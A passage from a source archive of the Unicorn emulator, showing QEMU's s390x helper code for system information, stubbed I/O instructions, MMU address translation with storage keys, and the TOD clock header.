cpu_to_be16(total_cpus); sysib.sysib_322.vm[0].conf_cpus = cpu_to_be16(conf_cpus); sysib.sysib_322.vm[0].reserved_cpus = cpu_to_be16(reserved_cpus); sysib.sysib_322.vm[0].caf = cpu_to_be32(1000); /* Linux kernel uses this to distinguish us from z/VM */ ebcdic_put(sysib.sysib_322.vm[0].cpi, "KVM/Linux ", 16); sysib.sysib_322.vm[0].ext_name_encoding = 2; /* UTF-8 */ /* If our VM has a name, use the real name */ if (qemu_name) { memset(sysib.sysib_322.vm[0].name, 0x40, sizeof(sysib.sysib_322.vm[0].name)); ebcdic_put(sysib.sysib_322.vm[0].name, qemu_name, MIN(sizeof(sysib.sysib_322.vm[0].name), strlen(qemu_name))); strncpy((char *)sysib.sysib_322.ext_names[0], qemu_name, sizeof(sysib.sysib_322.ext_names[0])); } else { ebcdic_put(sysib.sysib_322.vm[0].name, "TCGguest", 8); strcpy((char *)sysib.sysib_322.ext_names[0], "TCGguest"); } /* add the uuid */ memcpy(sysib.sysib_322.vm[0].uuid, &qemu_uuid, sizeof(sysib.sysib_322.vm[0].uuid)); } else { cc = 3; } break; } if (cc == 0) { if (s390_cpu_virt_mem_write(cpu, a0, 0, &sysib, sizeof(sysib))) { s390_cpu_virt_mem_handle_exc(cpu, ra); } } return cc; #endif return 0; } uint32_t HELPER(sigp)(CPUS390XState *env, uint64_t order_code, uint32_t r1, uint32_t r3) { #if 0 int cc; /* TODO: needed to inject interrupts - push further down */ qemu_mutex_lock_iothread(); cc = handle_sigp(env, order_code & SIGP_ORDER_MASK, r1, r3); qemu_mutex_unlock_iothread(); return cc; #endif return 0; } void HELPER(xsch)(CPUS390XState *env, uint64_t r1) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_xsch(cpu, r1, GETPC()); qemu_mutex_unlock_iothread(); 
#endif } void HELPER(csch)(CPUS390XState *env, uint64_t r1) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_csch(cpu, r1, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(hsch)(CPUS390XState *env, uint64_t r1) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_hsch(cpu, r1, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(msch)(CPUS390XState *env, uint64_t r1, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_msch(cpu, r1, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(rchp)(CPUS390XState *env, uint64_t r1) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_rchp(cpu, r1, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(rsch)(CPUS390XState *env, uint64_t r1) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_rsch(cpu, r1, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(sal)(CPUS390XState *env, uint64_t r1) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_sal(cpu, r1, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(schm)(CPUS390XState *env, uint64_t r1, uint64_t r2, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_schm(cpu, r1, r2, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(ssch)(CPUS390XState *env, uint64_t r1, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_ssch(cpu, r1, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(stcrw)(CPUS390XState *env, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_stcrw(cpu, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(stsch)(CPUS390XState *env, uint64_t r1, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_stsch(cpu, r1, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } uint32_t HELPER(tpi)(CPUS390XState *env, uint64_t addr) { #if 0 const uintptr_t ra = GETPC(); S390CPU *cpu = env_archcpu(env); QEMUS390FLICState *flic = s390_get_qemu_flic(s390_get_flic()); QEMUS390FlicIO *io = NULL; LowCore *lowcore; if (addr & 0x3) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } qemu_mutex_lock_iothread(); io = qemu_s390_flic_dequeue_io(flic, env->cregs[6]); if (!io) { qemu_mutex_unlock_iothread(); return 0; } if (addr) { struct { uint16_t id; uint16_t nr; uint32_t parm; } intc = { .id = cpu_to_be16(io->id), .nr = cpu_to_be16(io->nr), .parm = cpu_to_be32(io->parm), }; if (s390_cpu_virt_mem_write(cpu, addr, 0, &intc, sizeof(intc))) { /* writing failed, reinject and properly clean up */ s390_io_interrupt(io->id, io->nr, io->parm, io->word); qemu_mutex_unlock_iothread(); g_free(io); s390_cpu_virt_mem_handle_exc(cpu, ra); return 0; } } else { /* no protection applies */ lowcore = cpu_map_lowcore(env); lowcore->subchannel_id = cpu_to_be16(io->id); lowcore->subchannel_nr = cpu_to_be16(io->nr); lowcore->io_int_parm = cpu_to_be32(io->parm); lowcore->io_int_word = cpu_to_be32(io->word); cpu_unmap_lowcore(env, lowcore); } g_free(io); qemu_mutex_unlock_iothread(); #endif return 1; } void HELPER(tsch)(CPUS390XState *env, uint64_t r1, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_tsch(cpu, r1, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); 
#endif } void HELPER(chsc)(CPUS390XState *env, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_chsc(cpu, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(per_check_exception)(CPUS390XState *env) { if (env->per_perc_atmid) { tcg_s390_program_interrupt(env, PGM_PER, GETPC()); } } /* Check if an address is within the PER starting address and the PER ending address. The address range might loop. */ static inline bool get_per_in_range(CPUS390XState *env, uint64_t addr) { if (env->cregs[10] <= env->cregs[11]) { return env->cregs[10] <= addr && addr <= env->cregs[11]; } else { return env->cregs[10] <= addr || addr <= env->cregs[11]; } } void HELPER(per_branch)(CPUS390XState *env, uint64_t from, uint64_t to) { if ((env->cregs[9] & PER_CR9_EVENT_BRANCH)) { if (!(env->cregs[9] & PER_CR9_CONTROL_BRANCH_ADDRESS) || get_per_in_range(env, to)) { env->per_address = from; env->per_perc_atmid = PER_CODE_EVENT_BRANCH | get_per_atmid(env); } } } void HELPER(per_ifetch)(CPUS390XState *env, uint64_t addr) { if ((env->cregs[9] & PER_CR9_EVENT_IFETCH) && get_per_in_range(env, addr)) { env->per_address = addr; env->per_perc_atmid = PER_CODE_EVENT_IFETCH | get_per_atmid(env); /* If the instruction has to be nullified, trigger the exception immediately. */ if (env->cregs[9] & PER_CR9_EVENT_NULLIFICATION) { CPUState *cs = env_cpu(env); env->per_perc_atmid |= PER_CODE_EVENT_NULLIFICATION; env->int_pgm_code = PGM_PER; env->int_pgm_ilen = get_ilen(cpu_ldub_code(env, addr)); cs->exception_index = EXCP_PGM; cpu_loop_exit(cs); } } } void HELPER(per_store_real)(CPUS390XState *env) { if ((env->cregs[9] & PER_CR9_EVENT_STORE) && (env->cregs[9] & PER_CR9_EVENT_STORE_REAL)) { /* PSW is saved just before calling the helper. */ env->per_address = env->psw.addr; env->per_perc_atmid = PER_CODE_EVENT_STORE_REAL | get_per_atmid(env); } } static uint8_t stfl_bytes[2048]; static unsigned int used_stfl_bytes; static void prepare_stfl(void) { #if 0 static bool initialized; int i; /* racy, but we don't care, the same values are always written */ if (initialized) { return; } s390_get_feat_block(S390_FEAT_TYPE_STFL, stfl_bytes); for (i = 0; i < sizeof(stfl_bytes); i++) { if (stfl_bytes[i]) { used_stfl_bytes = i + 1; } } initialized = true; #endif } void HELPER(stfl)(CPUS390XState *env) { LowCore *lowcore; lowcore = cpu_map_lowcore(env); prepare_stfl(); memcpy(&lowcore->stfl_fac_list, stfl_bytes, sizeof(lowcore->stfl_fac_list)); cpu_unmap_lowcore(env, lowcore); } uint32_t HELPER(stfle)(CPUS390XState *env, uint64_t addr) { const uintptr_t ra = GETPC(); const int count_bytes = ((env->regs[0] & 0xff) + 1) * 8; int max_bytes; int i; if (addr & 0x7) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } prepare_stfl(); max_bytes = ROUND_UP(used_stfl_bytes, 8); /* * The PoP says that doublewords beyond the highest-numbered facility * bit may or may not be stored. However, existing hardware appears to * not store the words, and existing software depend on that. */ for (i = 0; i < MIN(count_bytes, max_bytes); ++i) { cpu_stb_data_ra(env, addr + i, stfl_bytes[i], ra); } env->regs[0] = deposit64(env->regs[0], 0, 8, (max_bytes / 8) - 1); return count_bytes >= max_bytes ? 0 : 3; } /* * Note: we ignore any return code of the functions called for the pci * instructions, as the only time they return !0 is when the stub is * called, and in that case we didn't even offer the zpci facility. * The only exception is SIC, where program checks need to be handled * by the caller. 
*/ void HELPER(clp)(CPUS390XState *env, uint32_t r2) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); clp_service_call(cpu, r2, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(pcilg)(CPUS390XState *env, uint32_t r1, uint32_t r2) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); pcilg_service_call(cpu, r1, r2, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(pcistg)(CPUS390XState *env, uint32_t r1, uint32_t r2) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); pcistg_service_call(cpu, r1, r2, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(stpcifc)(CPUS390XState *env, uint32_t r1, uint64_t fiba, uint32_t ar) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); stpcifc_service_call(cpu, r1, fiba, ar, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(sic)(CPUS390XState *env, uint64_t r1, uint64_t r3) { #if 0 int r; qemu_mutex_lock_iothread(); r = css_do_sic(env, (r3 >> 27) & 0x7, r1 & 0xffff); qemu_mutex_unlock_iothread(); /* css_do_sic() may actually return a PGM_xxx value to inject */ if (r) { tcg_s390_program_interrupt(env, -r, GETPC()); } #endif } void HELPER(rpcit)(CPUS390XState *env, uint32_t r1, uint32_t r2) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); rpcit_service_call(cpu, r1, r2, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(pcistb)(CPUS390XState *env, uint32_t r1, uint32_t r3, uint64_t gaddr, uint32_t ar) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); pcistb_service_call(cpu, r1, r3, gaddr, ar, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(mpcifc)(CPUS390XState *env, uint32_t r1, uint64_t fiba, uint32_t ar) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); mpcifc_service_call(cpu, r1, fiba, ar, GETPC()); qemu_mutex_unlock_iothread(); #endif } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/mmu_helper.c��������������������������������������������������������0000664�0000000�0000000�00000043406�14675241067�0020637�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S390x MMU related functions * * Copyright (c) 2011 Alexander Graf * Copyright (c) 2015 Thomas Huth, IBM Corporation * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. 
*/ #include "qemu/osdep.h" //#include "exec/address-spaces.h" #include "cpu.h" #include "internal.h" #include "sysemu/tcg.h" #include "exec/exec-all.h" //#include "hw/hw.h" #include "hw/s390x/storage-keys.h" /* Fetch/store bits in the translation exception code: */ #define FS_READ 0x800 #define FS_WRITE 0x400 static void trigger_access_exception(CPUS390XState *env, uint32_t type, uint64_t tec) { CPUState *cs = env_cpu(env); if (type != PGM_ADDRESSING) { #ifdef UNICORN_ARCH_POSTFIX glue(stq_phys, UNICORN_ARCH_POSTFIX)(env->uc, cs->as, env->psa + offsetof(LowCore, trans_exc_code), tec); #else stq_phys(env->uc, cs->as, env->psa + offsetof(LowCore, trans_exc_code), tec); #endif } trigger_pgm_exception(env, type); } /* check whether the address would be proteted by Low-Address Protection */ static bool is_low_address(uint64_t addr) { return addr <= 511 || (addr >= 4096 && addr <= 4607); } /* check whether Low-Address Protection is enabled for mmu_translate() */ static bool lowprot_enabled(const CPUS390XState *env, uint64_t asc) { if (!(env->cregs[0] & CR0_LOWPROT)) { return false; } if (!(env->psw.mask & PSW_MASK_DAT)) { return true; } /* Check the private-space control bit */ switch (asc) { case PSW_ASC_PRIMARY: return !(env->cregs[1] & ASCE_PRIVATE_SPACE); case PSW_ASC_SECONDARY: return !(env->cregs[7] & ASCE_PRIVATE_SPACE); case PSW_ASC_HOME: return !(env->cregs[13] & ASCE_PRIVATE_SPACE); default: /* We don't support access register mode */ // error_report("unsupported addressing mode"); exit(1); } } /** * Translate real address to absolute (= physical) * address by taking care of the prefix mapping. */ target_ulong mmu_real2abs(CPUS390XState *env, target_ulong raddr) { if (raddr < 0x2000) { return raddr + env->psa; /* Map the lowcore. */ } else if (raddr >= env->psa && raddr < env->psa + 0x2000) { return raddr - env->psa; /* Map the 0 page. */ } return raddr; } static inline bool read_table_entry(CPUS390XState *env, hwaddr gaddr, uint64_t *entry) { CPUState *cs = env_cpu(env); /* * According to the PoP, these table addresses are "unpredictably real * or absolute". Also, "it is unpredictable whether the address wraps * or an addressing exception is recognized". * * We treat them as absolute addresses and don't wrap them. 
*/ if (unlikely(address_space_read(cs->as, gaddr, MEMTXATTRS_UNSPECIFIED, entry, sizeof(*entry)) != MEMTX_OK)) { return false; } *entry = be64_to_cpu(*entry); return true; } static int mmu_translate_asce(CPUS390XState *env, target_ulong vaddr, uint64_t asc, uint64_t asce, target_ulong *raddr, int *flags, int rw) { const bool edat1 = (env->cregs[0] & CR0_EDAT) && s390_has_feat(env->uc, S390_FEAT_EDAT); const bool edat2 = edat1 && s390_has_feat(env->uc, S390_FEAT_EDAT_2); const bool iep = (env->cregs[0] & CR0_IEP) && s390_has_feat(env->uc, S390_FEAT_INSTRUCTION_EXEC_PROT); const int asce_tl = asce & ASCE_TABLE_LENGTH; const int asce_p = asce & ASCE_PRIVATE_SPACE; hwaddr gaddr = asce & ASCE_ORIGIN; uint64_t entry; if (asce & ASCE_REAL_SPACE) { /* direct mapping */ *raddr = vaddr; return 0; } switch (asce & ASCE_TYPE_MASK) { case ASCE_TYPE_REGION1: if (VADDR_REGION1_TL(vaddr) > asce_tl) { return PGM_REG_FIRST_TRANS; } gaddr += VADDR_REGION1_TX(vaddr) * 8; break; case ASCE_TYPE_REGION2: if (VADDR_REGION1_TX(vaddr)) { return PGM_ASCE_TYPE; } if (VADDR_REGION2_TL(vaddr) > asce_tl) { return PGM_REG_SEC_TRANS; } gaddr += VADDR_REGION2_TX(vaddr) * 8; break; case ASCE_TYPE_REGION3: if (VADDR_REGION1_TX(vaddr) || VADDR_REGION2_TX(vaddr)) { return PGM_ASCE_TYPE; } if (VADDR_REGION3_TL(vaddr) > asce_tl) { return PGM_REG_THIRD_TRANS; } gaddr += VADDR_REGION3_TX(vaddr) * 8; break; case ASCE_TYPE_SEGMENT: if (VADDR_REGION1_TX(vaddr) || VADDR_REGION2_TX(vaddr) || VADDR_REGION3_TX(vaddr)) { return PGM_ASCE_TYPE; } if (VADDR_SEGMENT_TL(vaddr) > asce_tl) { return PGM_SEGMENT_TRANS; } gaddr += VADDR_SEGMENT_TX(vaddr) * 8; break; } switch (asce & ASCE_TYPE_MASK) { case ASCE_TYPE_REGION1: if (!read_table_entry(env, gaddr, &entry)) { return PGM_ADDRESSING; } if (entry & REGION_ENTRY_I) { return PGM_REG_FIRST_TRANS; } if ((entry & REGION_ENTRY_TT) != REGION_ENTRY_TT_REGION1) { return PGM_TRANS_SPEC; } if (VADDR_REGION2_TL(vaddr) < (entry & REGION_ENTRY_TF) >> 6 || VADDR_REGION2_TL(vaddr) > (entry & REGION_ENTRY_TL)) { return PGM_REG_SEC_TRANS; } if (edat1 && (entry & REGION_ENTRY_P)) { *flags &= ~PAGE_WRITE; } gaddr = (entry & REGION_ENTRY_ORIGIN) + VADDR_REGION2_TX(vaddr) * 8; /* fall through */ case ASCE_TYPE_REGION2: if (!read_table_entry(env, gaddr, &entry)) { return PGM_ADDRESSING; } if (entry & REGION_ENTRY_I) { return PGM_REG_SEC_TRANS; } if ((entry & REGION_ENTRY_TT) != REGION_ENTRY_TT_REGION2) { return PGM_TRANS_SPEC; } if (VADDR_REGION3_TL(vaddr) < (entry & REGION_ENTRY_TF) >> 6 || VADDR_REGION3_TL(vaddr) > (entry & REGION_ENTRY_TL)) { return PGM_REG_THIRD_TRANS; } if (edat1 && (entry & REGION_ENTRY_P)) { *flags &= ~PAGE_WRITE; } gaddr = (entry & REGION_ENTRY_ORIGIN) + VADDR_REGION3_TX(vaddr) * 8; /* fall through */ case ASCE_TYPE_REGION3: if (!read_table_entry(env, gaddr, &entry)) { return PGM_ADDRESSING; } if (entry & REGION_ENTRY_I) { return PGM_REG_THIRD_TRANS; } if ((entry & REGION_ENTRY_TT) != REGION_ENTRY_TT_REGION3) { return PGM_TRANS_SPEC; } if (edat2 && (entry & REGION3_ENTRY_CR) && asce_p) { return PGM_TRANS_SPEC; } if (edat1 && (entry & REGION_ENTRY_P)) { *flags &= ~PAGE_WRITE; } if (edat2 && (entry & REGION3_ENTRY_FC)) { if (iep && (entry & REGION3_ENTRY_IEP)) { *flags &= ~PAGE_EXEC; } *raddr = (entry & REGION3_ENTRY_RFAA) | (vaddr & ~REGION3_ENTRY_RFAA); return 0; } if (VADDR_SEGMENT_TL(vaddr) < (entry & REGION_ENTRY_TF) >> 6 || VADDR_SEGMENT_TL(vaddr) > (entry & REGION_ENTRY_TL)) { return PGM_SEGMENT_TRANS; } gaddr = (entry & REGION_ENTRY_ORIGIN) + VADDR_SEGMENT_TX(vaddr) * 8; /* fall 
through */ case ASCE_TYPE_SEGMENT: if (!read_table_entry(env, gaddr, &entry)) { return PGM_ADDRESSING; } if (entry & SEGMENT_ENTRY_I) { return PGM_SEGMENT_TRANS; } if ((entry & SEGMENT_ENTRY_TT) != SEGMENT_ENTRY_TT_SEGMENT) { return PGM_TRANS_SPEC; } if ((entry & SEGMENT_ENTRY_CS) && asce_p) { return PGM_TRANS_SPEC; } if (entry & SEGMENT_ENTRY_P) { *flags &= ~PAGE_WRITE; } if (edat1 && (entry & SEGMENT_ENTRY_FC)) { if (iep && (entry & SEGMENT_ENTRY_IEP)) { *flags &= ~PAGE_EXEC; } *raddr = (entry & SEGMENT_ENTRY_SFAA) | (vaddr & ~SEGMENT_ENTRY_SFAA); return 0; } gaddr = (entry & SEGMENT_ENTRY_ORIGIN) + VADDR_PAGE_TX(vaddr) * 8; break; } if (!read_table_entry(env, gaddr, &entry)) { return PGM_ADDRESSING; } if (entry & PAGE_ENTRY_I) { return PGM_PAGE_TRANS; } if (entry & PAGE_ENTRY_0) { return PGM_TRANS_SPEC; } if (entry & PAGE_ENTRY_P) { *flags &= ~PAGE_WRITE; } if (iep && (entry & PAGE_ENTRY_IEP)) { *flags &= ~PAGE_EXEC; } *raddr = entry & TARGET_PAGE_MASK; return 0; } static void mmu_handle_skey(uc_engine *uc, target_ulong addr, int rw, int *flags) { S390SKeysState *ss = (S390SKeysState *)(&((S390CPU *)uc->cpu)->ss); S390SKeysClass *skeyclass = S390_SKEYS_GET_CLASS(ss); uint8_t key; int rc; #if 0 if (unlikely(addr >= ram_size)) { return; } #endif /* * Whenever we create a new TLB entry, we set the storage key reference * bit. In case we allow write accesses, we set the storage key change * bit. Whenever the guest changes the storage key, we have to flush the * TLBs of all CPUs (the whole TLB or all affected entries), so that the * next reference/change will result in an MMU fault and make us properly * update the storage key here. * * Note 1: "record of references ... is not necessarily accurate", * "change bit may be set in case no storing has occurred". * -> We can set reference/change bits even on exceptions. * Note 2: certain accesses seem to ignore storage keys. For example, * DAT translation does not set reference bits for table accesses. * * TODO: key-controlled protection. Only CPU accesses make use of the * PSW key. CSS accesses are different - we have to pass in the key. * * TODO: we have races between getting and setting the key. */ rc = skeyclass->get_skeys(ss, addr / TARGET_PAGE_SIZE, 1, &key); if (rc) { // trace_get_skeys_nonzero(rc); return; } switch (rw) { case MMU_DATA_LOAD: case MMU_INST_FETCH: /* * The TLB entry has to remain write-protected on read-faults if * the storage key does not indicate a change already. Otherwise * we might miss setting the change bit on write accesses. */ if (!(key & SK_C)) { *flags &= ~PAGE_WRITE; } break; case MMU_DATA_STORE: key |= SK_C; break; default: g_assert_not_reached(); } /* Any store/fetch sets the reference bit */ key |= SK_R; rc = skeyclass->set_skeys(ss, addr / TARGET_PAGE_SIZE, 1, &key); if (rc) { // trace_set_skeys_nonzero(rc); } } /** * Translate a virtual (logical) address into a physical (absolute) address. * @param vaddr the virtual address * @param rw 0 = read, 1 = write, 2 = code fetch * @param asc address space control (one of the PSW_ASC_* modes) * @param raddr the translated address is stored to this pointer * @param flags the PAGE_READ/WRITE/EXEC flags are stored to this pointer * @param exc true = inject a program check if a fault occurred * @return 0 = success, != 0, the exception to raise */ int mmu_translate(CPUS390XState *env, target_ulong vaddr, int rw, uint64_t asc, target_ulong *raddr, int *flags, uint64_t *tec) { uint64_t asce; int r; *tec = (vaddr & TARGET_PAGE_MASK) | (asc >> 46) | (rw == MMU_DATA_STORE ? 
FS_WRITE : FS_READ); *flags = PAGE_READ | PAGE_WRITE | PAGE_EXEC; if (is_low_address(vaddr & TARGET_PAGE_MASK) && lowprot_enabled(env, asc)) { /* * If any part of this page is currently protected, make sure the * TLB entry will not be reused. * * As the protected range is always the first 512 bytes of the * two first pages, we are able to catch all writes to these areas * just by looking at the start address (triggering the tlb miss). */ *flags |= PAGE_WRITE_INV; if (is_low_address(vaddr) && rw == MMU_DATA_STORE) { /* LAP sets bit 56 */ *tec |= 0x80; return PGM_PROTECTION; } } vaddr &= TARGET_PAGE_MASK; if (!(env->psw.mask & PSW_MASK_DAT)) { *raddr = vaddr; goto nodat; } switch (asc) { case PSW_ASC_PRIMARY: asce = env->cregs[1]; break; case PSW_ASC_HOME: asce = env->cregs[13]; break; case PSW_ASC_SECONDARY: asce = env->cregs[7]; break; case PSW_ASC_ACCREG: default: // hw_error("guest switched to unknown asc mode\n"); break; } /* perform the DAT translation */ r = mmu_translate_asce(env, vaddr, asc, asce, raddr, flags, rw); if (unlikely(r)) { return r; } /* check for DAT protection */ if (unlikely(rw == MMU_DATA_STORE && !(*flags & PAGE_WRITE))) { /* DAT sets bit 61 only */ *tec |= 0x4; return PGM_PROTECTION; } /* check for Instruction-Execution-Protection */ if (unlikely(rw == MMU_INST_FETCH && !(*flags & PAGE_EXEC))) { /* IEP sets bit 56 and 61 */ *tec |= 0x84; return PGM_PROTECTION; } nodat: /* Convert real address -> absolute address */ *raddr = mmu_real2abs(env, *raddr); mmu_handle_skey(env->uc, *raddr, rw, flags); return 0; } /** * translate_pages: Translate a set of consecutive logical page addresses * to absolute addresses. This function is used for TCG and old KVM without * the MEMOP interface. */ static int translate_pages(S390CPU *cpu, vaddr addr, int nr_pages, target_ulong *pages, bool is_write, uint64_t *tec) { uint64_t asc = cpu->env.psw.mask & PSW_MASK_ASC; CPUS390XState *env = &cpu->env; int ret, i, pflags; for (i = 0; i < nr_pages; i++) { ret = mmu_translate(env, addr, is_write, asc, &pages[i], &pflags, tec); if (ret) { return ret; } if (!address_space_access_valid(env_cpu(env)->as, pages[i], TARGET_PAGE_SIZE, is_write, MEMTXATTRS_UNSPECIFIED)) { *tec = 0; /* unused */ return PGM_ADDRESSING; } addr += TARGET_PAGE_SIZE; } return 0; } /** * s390_cpu_virt_mem_rw: * @laddr: the logical start address * @ar: the access register number * @hostbuf: buffer in host memory. NULL = do only checks w/o copying * @len: length that should be transferred * @is_write: true = write, false = read * Returns: 0 on success, non-zero if an exception occurred * * Copy from/to guest memory using logical addresses. Note that we inject a * program interrupt in case there is an error while accessing the memory. * * This function will always return (also for TCG), make sure to call * s390_cpu_virt_mem_handle_exc() to properly exit the CPU loop. 
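 *
 * Hypothetical usage sketch (names are local to this example):
 *
 *     uint32_t word;
 *     if (s390_cpu_virt_mem_rw(cpu, laddr, 0, &word, sizeof(word), false)) {
 *         s390_cpu_virt_mem_handle_exc(cpu, ra);  // exits the CPU loop
 *     }
 *     // on success, "word" holds the guest data at logical address laddr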
*/
int s390_cpu_virt_mem_rw(S390CPU *cpu, vaddr laddr, uint8_t ar, void *hostbuf,
                         int len, bool is_write)
{
    int currlen, nr_pages, i;
    target_ulong *pages;
    uint64_t tec;
    int ret;
    CPUS390XState *env = &cpu->env;

    nr_pages = (((laddr & ~TARGET_PAGE_MASK) + len - 1) >> TARGET_PAGE_BITS)
               + 1;
    pages = g_malloc(nr_pages * sizeof(*pages));

    ret = translate_pages(cpu, laddr, nr_pages, pages, is_write, &tec);
    if (ret) {
        trigger_access_exception(&cpu->env, ret, tec);
    } else if (hostbuf != NULL) {
        /* Copy data by stepping through the area page by page */
        for (i = 0; i < nr_pages; i++) {
            currlen = MIN(len, TARGET_PAGE_SIZE - (laddr % TARGET_PAGE_SIZE));
            cpu_physical_memory_rw(env_cpu(env)->as,
                                   pages[i] | (laddr & ~TARGET_PAGE_MASK),
                                   hostbuf, currlen, is_write);
            laddr += currlen;
            hostbuf = (void *)(((char *)hostbuf) + currlen);
            len -= currlen;
        }
    }

    g_free(pages);
    return ret;
}

void s390_cpu_virt_mem_handle_exc(S390CPU *cpu, uintptr_t ra)
{
    /* KVM will handle the interrupt automatically, TCG has to exit the TB */
    cpu_loop_exit_restore(CPU(cpu), ra);
}

/**
 * Translate a real address into a physical (absolute) address.
 * @param raddr  the real address
 * @param rw     0 = read, 1 = write, 2 = code fetch
 * @param addr   the translated address is stored to this pointer
 * @param flags  the PAGE_READ/WRITE/EXEC flags are stored to this pointer
 * @return       0 = success, != 0, the exception to raise
 */
int mmu_translate_real(CPUS390XState *env, target_ulong raddr, int rw,
                       target_ulong *addr, int *flags, uint64_t *tec)
{
    const bool lowprot_enabled = env->cregs[0] & CR0_LOWPROT;

    *flags = PAGE_READ | PAGE_WRITE | PAGE_EXEC;
    if (is_low_address(raddr & TARGET_PAGE_MASK) && lowprot_enabled) {
        /* see comment in mmu_translate() how this works */
        *flags |= PAGE_WRITE_INV;
        if (is_low_address(raddr) && rw == MMU_DATA_STORE) {
            /* LAP sets bit 56 */
            *tec = (raddr & TARGET_PAGE_MASK) | FS_WRITE | 0x80;
            return PGM_PROTECTION;
        }
    }

    *addr = mmu_real2abs(env, raddr & TARGET_PAGE_MASK);

    mmu_handle_skey(env->uc, *addr, rw, flags);
    return 0;
}

unicorn-2.1.1/qemu/target/s390x/s390-tod.h

/*
 * TOD (Time Of Day) clock
 *
 * Copyright 2018 Red Hat, Inc.
 * Author(s): David Hildenbrand <david@redhat.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */

#ifndef TARGET_S390_TOD_H
#define TARGET_S390_TOD_H

/* The value of the TOD clock for 1.1.1970.
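   The TOD epoch is 1900-01-01 UTC, and bit 51 of the clock ticks once per
   microsecond, so one nanosecond corresponds to 4.096 (= 512/125) basic
   bit-63 units -- hence the "<< 9" and "/ 125" arithmetic in the
   converters below. As a worked example, time2tod() maps one second
   (1000000000 ns) to 1000000000 * 512 / 125 = 0xf4240000.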
*/ #define TOD_UNIX_EPOCH 0x7d91048bca000000ULL /* Converts ns to s390's clock format */ static inline uint64_t time2tod(uint64_t ns) { return (ns << 9) / 125 + (((ns & 0xff80000000000000ull) / 125) << 9); } /* Converts s390's clock format to ns */ static inline uint64_t tod2time(uint64_t t) { return ((t >> 9) * 125) + (((t & 0x1ff) * 125) >> 9); } #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/sigp.c��������������������������������������������������������������0000664�0000000�0000000�00000033161�14675241067�0017441�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * s390x SIGP instruction handling * * Copyright (c) 2009 Alexander Graf <agraf@suse.de> * Copyright IBM Corp. 2012 * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" //#include "exec/address-spaces.h" #include "exec/exec-all.h" #include "sysemu/tcg.h" typedef struct SigpInfo { uint64_t param; int cc; uint64_t *status_reg; } SigpInfo; // static void set_sigp_status(SigpInfo *si, uint64_t status) // { // *si->status_reg &= 0xffffffff00000000ULL; // *si->status_reg |= status; // si->cc = SIGP_CC_STATUS_STORED; // } // static void sigp_sense(S390CPU 